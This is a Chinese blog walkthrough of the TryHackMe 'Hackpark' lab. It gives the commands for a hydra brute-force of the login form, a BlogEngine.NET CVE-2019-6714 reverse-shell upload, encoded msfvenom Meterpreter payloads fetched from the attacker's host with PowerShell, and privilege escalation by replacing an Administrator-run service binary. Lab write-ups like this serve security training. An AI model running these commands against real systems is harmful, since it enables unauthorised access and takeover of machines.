hydra暴力破解登录(day4)


TryHackMe系列之Hackpark


思路总结

web查找漏洞突破web服务进入靶机获取普通shell,本地开启http服务,靶机利用shell wget下载msfconsole生成的反弹shell文件到temp文件夹,载入PEASS-ng文件渗透查看靶机信息,主查看服务漏洞,替换相应的服务二进制文件为反弹文件进行提权(前提二进制文件以Adminstrator运行),结束

信息收集

hydra爆破登入:


hydra命令格式:

hydra -L /root/user.txt -P /usr/share/wordlists/rockyou.txt 10.10.232.145 http-post-form '/Account/login.aspx:__VIEWSTATE=tW49D6YhZHqggL8cYt2E4wbbOsidyFwjaFwKftyf%2F%2FYNJNDD8zr8g%2B4Mep44UJ9wk1EpNlrkmDLui5PO0kzLRaTBOPlGQ%2FCI%2BdZX5pE5%2Bub2ZGKolCUYvwNlM7yoK8HVE56%2FMSV3MvrEDoMHL5nHgeJ5wU0iA8y6ugOrXvssxU6E%2FUrmFFreqXbxMuhOuBVCnqQsBQ%2F50OoM5Hpg2jDvcKXZrpb33sPG0Gc%2FsCs4l0tcV93vW2bSs8fbYhyOpvBd%2F%2B%2FUP0DL%2BQ6T3VEhq3HzUgpYW60uKLB%2FXO6OQT6dBabRM4HN8edjK0e4G%2BcMXNtAjksMa1RMPGoVsCqDfW0cjMBxj2uvp1NwlaWJY1Xu7Tap2LEJ&__EVENTVALIDATION=2mHH4lkRFuuT84T8n2sLcJ2Fp8IKB0EKt9%2F3d21b7jow%2Fz8KKhl31d0av2mWW2dawaEJ%2Bes5PPqMmtzYtmskCKmj6%2BYpbXgiq%2FN9RhdIAzJ65yIUSF47QFpLY096HTY4E6gn8RAqz1yNB1eRJTu%2BV4oRNCAbBAvCGLPU0HVdAKR6PxFe&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=%E7%99%BB%E5%BD%95:login failed' 

需要的数据如下:

查看所有表单数据

BlogEngine:CVE-2019-6714

寻找Blogengine的版本信息:

用searchsploit 寻找BlogEngine 3.3.6版本的漏洞

把他拷贝出来查看,更改反弹ip和端口:

复现过程:


  1. 使用有权添加或编辑博客文章的用户登录 BlogEngine.NET 实例。

  2. 导航到 内容 菜单。

  3. 此屏幕上应显示帖子列表。单击 “新建” 以添加一个。

  4. 在帖子正文上方的工具栏中,应该有许多图标。应该有一个看起来像打开的文件,称为 文件管理器。单击此图标。

  5. 这里,只需上传之前编辑的 PostView.ascx 文件即可。

  6. 确保您有一个 netcat 侦听器正在等待先前指定的 IP 和端口的连接。

  7. 浏览到以下URL,触发漏洞

    http://example.com/?theme =../../App_Data/files

您现在应该收到来自服务器的连接,并且有一个命令 shell 在 BlogEngine.NET Web 应用程序的上下文中运行。

成功拿到shell

转换meterpreter_shell


创建反弹文件

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.51.213 LPORT=7777 -f exe -o active.exe

开启本地http服务:

python3 -m http.server 80

使用以下powershell命令下载才有效果,另外一般temp文件夹是有写入权限的,一定要转入temp文件再上传

powershell -c wget "http://10.6.51.213:80/active.exe" -outfile "active.exe"

输入active.exe来简单的运行它,成功收到shell

msfconsole -qx 'use exploit/multi/handler;set lhost tun0;set lport 7777;set payload windows/meterpreter/reverse_tcp;run'

sysinfo

一样在temp文件夹里上传winPEASx64.exe

dir | findstr winPEAS
.\winPEASx64.exe

PEASS-ng工具


PEASS-ng是一组用于渗透测试和安全评估的工具集合,它主要用于Windows环境的渗透测试和权限提升。PEASS-ng是从PEASS(Privilege Escalation Awesome Scripts SUITE)项目衍生而来的,添加了一些新的工具和功能。

这个工具集包含了一系列用于Windows系统渗透测试的脚本和工具,可以帮助渗透测试人员发现和利用系统中的漏洞,提升权限并获取系统访问权限。一些常见的功能包括:

  1. 提权检查工具: 包括检查本地权限提升漏洞、服务权限提升漏洞等。
  2. 敏感信息查找工具: 可以帮助查找系统中的敏感信息,如明文密码、凭据、私钥等。
  3. 持久性工具: 用于在系统上建立持久性访问的工具,如创建后门、添加计划任务等。
  4. 横向移动工具: 用于在网络中横向移动的工具,如通过本地凭据获取其他主机的访问权限等。

.\winPEASx64.exe servicesinfo

日志查看:二进制文件利用


  • 对于一个服务出的漏洞,最佳思路就是替换它的服务文件,当服务在启动时是不会检查服务的文件是不是原文件,对此我们可以进行替换相应文件达到伪造的效果

查找一个二进制文件利用的方式是查看它的日志文件

可以发现每隔30秒就会运行一次Message文件,并且还是以Administrator身份运行的,那就创建反弹文件替换它就可以获得root权限的meterpreter_shell

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.51.213 LPORT=6666 -f exe -o Message.exe
msfconsole -qx 'use exploit/multi/handler;set lhost tun0;set lport 6666;set payload windows/meterpreter/reverse_tcp;run'

将文件复制到对应文件夹:

拿到shell,提权成功


文章作者: 矢坕
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 矢坕 !
  目录